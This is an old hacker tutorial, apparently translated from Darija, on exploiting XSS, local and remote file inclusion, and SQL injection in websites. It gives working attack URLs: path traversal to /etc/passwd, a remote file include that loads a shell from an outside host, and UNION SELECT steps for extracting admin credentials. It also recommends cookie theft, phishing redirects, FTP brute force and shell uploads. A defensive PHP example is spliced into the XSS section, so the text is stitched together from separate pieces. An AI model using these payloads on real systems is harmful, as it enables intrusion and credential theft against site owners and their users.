#####################################################################
##           [Morocco] Web Vulnerabilities Exploiting              ##
##                         -+-+-+-+-+-                             ##
##           Created By Mr.aFiR (Moroccan Hacker)                  ##
##           Email: q-_@hotmail.com                                ##
##           Website: www.aFiR.me                                  ##
##           (c) -- 18/12/2oo9                                     ##
#####################################################################
# To read this with a good style, use Notepad++ & select "MS INI file" from the Language menu.
#
##-Contents
#   |
#   |-INTRODUCTION
#   |-BODY
#   |   |
#   |   |-XSS (all)
#   |   |-LFI (php)
#   |   |-RFI (php)
#   |   |-MySQLi (php)
#   |   |-MsSQLi (asp,aspx)
#   |
#   |-CONCLUSION
#   |-GREETINGS
#   |
#   |-> In the name of God, let's begin :

[!] I. INTRODUCTION :

    How many times do we open some site, it throws an error at us and we understand nothing of it (this goes for some people :) ).
    Today we are here to put a stop to this problem, so that you know how to deal with errors, especially in PHP.
    Come on, let's begin, with God's blessing.

[!] II. BODY :

  [~] a. XSS (all):

    XSS (Cross Site Scripting) is the easiest vulnerability & it exists in a lot of sites, among them big sites like banks or big companies such as hotmail & facebook.
    And this XSS is easy, just pay attention with me a little :

    Ex.: sometimes we find a link like this :
        http://server/login.php?message=Invalid Login
    & we find that "Invalid Login" written somewhere in the page.
    This means that we can control it & change it just from the link.
    Let's try :
        http://server/login.php?message=
    If it goes through and even gives a message window with "aFiR" in it, that is what is called XSS, because with it you can take the cookies of the admin or of the users of a site.
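The reflected "message" parameter described above, as an added example that is not part of the original paper: the vulnerable echo beside output encoding and a server-side message table, plus the cookie flag that limits what a missed XSS can read. The function names, message codes and texts are assumptions.

```php
<?php
// Added example, not code from the paper. Function names, message codes
// and message texts are assumptions made for the demo.

// Pattern described above: the query-string value is written into the page as-is.
function render_vulnerable(string $message): string {
    return '<p class="error">' . $message . '</p>';
}

// Fix 1: encode on output, so markup characters are displayed, not parsed.
function render_encoded(string $message): string {
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="error">' . $safe . '</p>';
}

// Fix 2: the URL carries only a code; the displayed text comes from the server.
function render_by_code(string $code): string {
    $messages = [
        'invalid_login' => 'Invalid Login',
        'locked'        => 'Account locked',
    ];
    $text = array_key_exists($code, $messages) ? $messages[$code] : 'Unknown error';
    return render_encoded($text);
}

// Limits the damage of a missed XSS: the session cookie is not readable from
// scripts. Call before session_start(); the array form needs PHP 7.3+.
function harden_session_cookie(): bool {
    return session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

harden_session_cookie();

$probe = '<b>aFiR</b>';                       // constructed, harmless markup probe
echo render_vulnerable($probe), "\n";         // markup reaches the page unchanged
echo render_encoded($probe), "\n";            // shown as text: &lt;b&gt;aFiR&lt;/b&gt;
echo render_by_code('invalid_login'), "\n";   // known code, fixed text
echo render_by_code($probe), "\n";            // unknown code, falls back to "Unknown error"
```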
    Uses of XSS :
      * stealing cookies with it (Cookies Stealing)
      * putting a login iframe in it (iframe Attacks)
      * using it to redirect to your scam (Phishing Redirections)

    We are done with this one. I hope you understood something, otherwise go drink the sea.

  [~] b. LFI (php):

    LFI (Local File Include): this one is a bit weak, but even so it is useful on some servers, because with it we can read any file, provided it is not PHP.

    Ex.:
        http://server/index.php?lang=fr
    we change this to :
        http://server/index.php?lang=aFiR
    If it gives you an error like this :
        Warning : include('languages/aFiR.php') .../home/user/www/index.php on line x
        require('languages/aFiR.php') .../home/user/www/index.php on line x
    then you can exploit it & read "/etc/passwd" :
        http://server/index.php?lang=../../../../etc/passwd%00
    If safe_mode=OFF, the users of the server will come out for you,
    & that "%00" is what we use to make ".php" NULL, meaning it does not stay.

    The use of this vuln is that we read /etc/passwd & use it for an FTP Brute Force Attack, with which we can get FTP logins.

    If you did not understand this one, switch off that PC and get up from there | COME ON! | :D

  [~] c. RFI (php):

    RFI (Remote File Include): this one is the opposite of the first; with this one it is either white or black.
    In its error there is no directory at all, & here we can also do LFI.

    Ex.:
        http://server/index.php?page=news
    we change it to :
        http://server/index.php?page=aFiR
    it gives an error like this :
        Warning : include('aFiR.php') ...
        Warning : require('aFiR.php') ...
    this means it may be RFI. We change the link to :
        http://server/index.php?page=http://hacker/shell.txt?
    If the shell executes for you, good for you; otherwise Safe_mode=ON :s
    & to make ".php" NULL in RFI we put "?" at the end of the link.

  [~] d. MySQLi (php):

    MySQL Injection may look hard to you if you have never worked with it, but it really is easy.
    When you open some site, for example at the link /news.php?id=9,
    and you change the link to /news.php?id=9', an error will come up !
    It comes from the programmer, who put no conditions on $id !
    He wrote it directly like this :
        $query = mysql_query("SELECT * FROM news WHERE id=$id");
    meaning we can change the course of this query & with it get the admin's login.

    First thing, we look for the number of columns that we will put after "union select". We do :
        /news.php?id=9 order by 1--
    and we keep going up, increasing that "1" until the error comes up.
    For example, the error came up when we reached "14": the number of columns is "13".

    Now that we know "13" is the number of columns, we do :
        /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
    Now we will know the affected columns, which are the numbers that will show in the page.

    Now comes the turn of guessing the name of the table that holds the admin's login :
        /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from table_name--
    table_name we guess out of our own head; it can be admin, users, user, administrator ...
    When we try our guesses, as soon as the error disappears = the guess is right ;)

    After that comes guessing the admin's login and password. For example, 4 shows in the page :
        /news.php?id=-9 union select 1,2,3,col_name,5,6,7,8,9,10,11,12,13 from table_name--
    col_name is the guess for the login or the password :
        Login    : login, user, username, user_name, name, auth,...
        Password : password, pass, passwd,...

    After we know the login, we look for the Admin Panel, from which we can upload our shell.

     ________________________________________________________________________________
    | * These commands are specific to MySQL only :                                  |
    |________________________________________________________________________________|
    | version()   = tells us the version of the MySQL server                         |
    | datadir()   = tells us the path of mysql on the server                         |
    | concat()    = merges several columns into 1 column. Ex: concat(user,0x3a,pass) |
    | load_file() = reads files. Ex: load_file('/etc/passwd')                        |
    |________________________________________________________________________________|

  [~] e. MsSQLi (asp,aspx):

    As for MsSQLi (MicroSoft SQL injection), we follow the same steps as for MySQLi, with just a few conditions :
      1. "union select" = "union all select" (a small difference).
      2. "--" = "#" (the comment part, to cancel what comes after our query).
      3. In MsSQL the numbers of the affected columns do not show until we guess table_name.
      4. Here we do not work with the mysql commands that I gave you above.

    Now we are done. The good seller has sold and gone home.

[!] III. CONCLUSION :

    I hope you understood something from this course in Darija :) !
    I wrote the damn thing like an Arabic school composition :D !
    Whoever did not understand had better run home to his mother ! GO ON, RUN HOME TO YOUR MOTHER ! hhhhhhhhh
    I made this thing in Darija, first so that the sons of the country understand, & second so that none of those monkeys (pardon the word) understands; they will end up like donkeys (a bumpkin who understands nothing) :) all they are missing is the ears.
    Last thing: you are going to get up from that PC and go to sleep thinking about all this; as soon as you wake up in the morning, get on the PC & try to test everything you put into your head. So get up from there before I come out of the screen at you :D.
    Go on, off you go !

[!] IV. GREETINGS :

    Respect to you and to everyone who read this paper; I hope you like it & understand it well.
    Whoever did not understand something, there is my website, send your message from it ;)
    Finally, respect to all my friends, among them :
    "Dr.Crypter(my buddy), Love511(my uncle), Dr.BoB-Hacker(my friend), ****(MyLove)..."
    Whoever I forgot and did not name here, don't worry, you are in my thoughts ;)
    See you Next Time with something new ;)

---------------------------------------------------------------------------------------------------
[x] Author  : aFiR Abdel (Mr.aFiR)
[x] Email   : q-_[at]hotmail[dot]com
[x] Website : www.aFiR.me
# if you have something to tell me, just contact me ;)
---------------------------------------------------------------------------------------------------